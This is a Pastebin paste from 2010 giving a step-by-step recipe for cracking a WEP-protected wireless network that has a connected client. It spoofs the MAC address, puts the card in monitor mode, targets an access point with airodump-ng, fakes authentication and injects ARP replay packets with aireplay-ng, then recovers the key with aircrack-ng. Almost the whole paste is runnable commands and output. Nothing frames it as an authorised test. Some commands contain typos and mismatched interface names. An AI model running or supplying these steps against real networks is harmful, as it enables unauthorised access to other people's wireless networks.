API tools faq
paste
Advertisement
ak47suk1

wep with client

ak47suk1
Sep 28th, 2010
242
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 2.27 KB | None | 0 0
raw download clone embed print report
  1. cracking wep encrypted network with at least a client connected (aireplay -3):
  2.  
  3. -----------------------------------------------------------------------------
  4.  
  5. (1)spoof wireless card mac address
  6. (2)put wireless card into monitor mode
  7. (3)scan for the target AP using airodump-ng
  8. (4)fake authentication using aireplay-ng option -1
  9. (5)packet injection ie interactive frame selection using aireplay-ng option-3
  10. (6)find the wep key using aircrack-ng
  11. ------------------------------------------------------------------------------
  12. (1)spoof our wireless card mac address:
  13. ifcoonfig ath0 down
  14. ifconfig wifi0 down
  15. macchanger --mac 00:11:22:33:44:55 wifi0
  16.  
  17. my output is:
  18. Current MAC: <my mac> (unknown)
  19. Faked MAC:   00:11:22:33:44:55 (Cimsys Inc)
  20.  
  21. (2)put wireless card into monitor mode:
  22. ifconfig wifi0 up
  23. ifconfig ath0 down
  24. airmon-ng start wifi0
  25.  
  26. my output is:
  27. ...
  28. Interface   Chipset     Driver
  29.  
  30. wifi0       Atheros     madwifi-ng
  31. ath0        Atheros     madwifi-ng VAP (parent: wifi0)
  32. ath1        Atheros     madwifi-ng VAP (parent: wifi0) (monitor mode enabled)
  33.  
  34. (3)scan for the target AP using airodump-ng:
  35.  
  36. airodump-ng ath1
  37.  
  38.  
  39. hit ctrl+c to quit, then observe the channel n copy n paste the bssid (mac address AP):
  40.  
  41. airodump-ng -c <channel>  -w <output>  --bssid <APmac> rausb0
  42.  
  43.  
  44.  
  45. (here we focus on specific Ap such dat we filter out any othr possibilty of intrference from othr Aps on d same chnnl,
  46. hence, reduce the chance of a failed auth/association or a failed attack)
  47.  
  48. othr commands dat can be used:
  49.  
  50. airodump-ng -w <output> --ivs -c <channel> ath1
  51.  
  52.  
  53.  
  54. (4)fake authentication using aireplay-ng option -1:
  55.  
  56. aireplay-ng -1 0 -e <APname>  -a <APmac> -h <yourmac> ath1
  57.  
  58. other command can be used:
  59. aireplay-ng -1 6000 -o 1 -q 10 -e <APname> -a <APmac> -h <yourmac> rausb0
  60.  
  61.  
  62.  
  63.  
  64.  
  65. (5)packet injection ie interactive frame selection using aireplay-ng option-3:
  66.  
  67. aireplay-ng -3 -b <APmac> -h <yourmac/client> ath1
  68.  
  69.  
  70. (6)find the wep key using aircrack-ng:
  71.  
  72. aircrack-ng <output>*.cap
  73. or
  74. aircrack-ng -P 1  <output>*.cap
  75. aircrack-ng -z  <output>*.cap
  76. aircrack-ng -P 1 [-b <Apmac>] <output>*.cap
  77. aircrack-ng -z  [-b <Apmac>] <output>*.cap
  78. aircrack-ng -n 64 -z -f 1 -e <APname> -b <apmac> <output>*.cap
  79.  
  80. aircrack-ng -n 128  <output>*.cap
  81.  
  82. aircrack-ng -a 1 -b <Apmac> <output>
  83.  
  84. n bee pation
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!